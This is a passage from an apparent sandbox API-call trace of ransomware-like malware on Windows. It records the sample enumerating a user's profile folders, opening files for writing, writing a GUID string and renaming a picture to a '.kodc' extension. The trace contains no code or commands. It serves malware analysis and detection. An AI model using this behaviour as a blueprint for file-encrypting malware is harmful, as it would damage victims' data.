hHeap=0x630000, dwFlags=0x0, lpMem=0x9b9c950 | out: hHeap=0x630000) returned 1 [0099.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.841] WriteFile (in: hFile=0x5cc, lpBuffer=0x333b018*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x333b018*, lpNumberOfBytesWritten=0x9e2fb50*=0x28, lpOverlapped=0x0) returned 1 [0099.841] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333b018 | out: hHeap=0x630000) returned 1 [0099.841] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0099.841] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0099.841] CloseHandle (hObject=0x5cc) returned 1 [0099.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.843] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x870) returned 0x333bc58 [0099.843] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce548 | out: hHeap=0x630000) returned 1 [0099.843] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_FuF.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_fuf.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\_FuF.gif.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\_fuf.gif.kodc")) returned 1 [0099.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.844] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0099.844] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0099.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33362c8 | out: hHeap=0x630000) returned 1 [0099.845] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0 [0099.845] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0099.845] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317100 | out: hHeap=0x630000) returned 1 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3318ea0 | out: hHeap=0x630000) returned 1 [0099.846] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.846] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.846] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.846] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x9b91b28 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b91b28 | out: hHeap=0x630000) returned 1 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.847] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.847] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x333bc58 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x333bc58 | out: hHeap=0x630000) returned 1 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.848] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.848] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x9b79750 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b79750 | out: hHeap=0x630000) returned 1 [0099.849] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ce3a8 | out: hHeap=0x630000) returned 1 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.849] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x9b79750 [0099.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\") returned="PrintHood\\" [0099.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.850] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.850] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.850] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.850] PathFindFileNameW (pszPath="") returned="" [0099.850] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.850] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\PrintHood\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0xffffffff [0099.851] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0099.852] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.852] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\") returned="Recent\\" [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.852] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.852] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.852] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.852] PathFindFileNameW (pszPath="") returned="" [0099.852] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.853] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Recent\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7efb8ce0, ftCreationTime.dwHighDateTime=0x1d5ba81, ftLastAccessTime.dwLowDateTime=0x37cdb3b0, ftLastAccessTime.dwHighDateTime=0x1d5b659, ftLastWriteTime.dwLowDateTime=0x37cdb3b0, ftLastWriteTime.dwHighDateTime=0x1d5b659, nFileSizeHigh=0x0, nFileSizeLow=0x11197, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_FuF.gif", cAlternateFileName="")) returned 0xffffffff [0099.853] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.853] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.853] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\") returned="Saved Games\\" [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.853] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.853] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.853] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.854] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.854] PathFindFileNameW (pszPath="") returned="" [0099.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.854] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0099.854] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.854] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce3a8 [0099.854] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e7c0 [0099.854] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Saved Games\\desktop.ini") returned=".ini" [0099.854] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0099.854] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0099.855] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0099.855] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\") returned="Searches\\" [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0099.855] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317100 [0099.855] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0099.855] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0099.855] PathFindFileNameW (pszPath="") returned="" [0099.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x32ce548 [0099.856] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x670618 [0099.856] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0099.856] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0099.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x76) returned 0x33362c8 [0099.856] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\desktop.ini") returned=".ini" [0099.856] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99d9932, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Everywhere.search-ms", cAlternateFileName="EVERYW~1.SEA")) returned 1 [0099.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.856] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x6932f0 [0099.856] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms") returned=".search-ms" [0099.856] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.857] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 1 [0099.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0099.857] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned=".search-ms" [0099.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.857] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x23, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf99b37d1, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0xf8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Indexed Locations.search-ms", cAlternateFileName="INDEXE~1.SEA")) returned 0 [0099.857] FindClose (in: hFindFile=0x670618 | out: hFindFile=0x670618) returned 1 [0099.857] PeekMessageW (in: lpMsg=0x9e2ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2ff08) returned 0 [0099.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x3318ea0 [0099.857] PeekMessageW (in: lpMsg=0x9e2fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9e2fb74) returned 0 [0099.857] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x33183f8 [0099.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x9b79750 [0099.858] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\") returned="SendTo\\" [0099.858] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9b9bfe0 [0099.858] 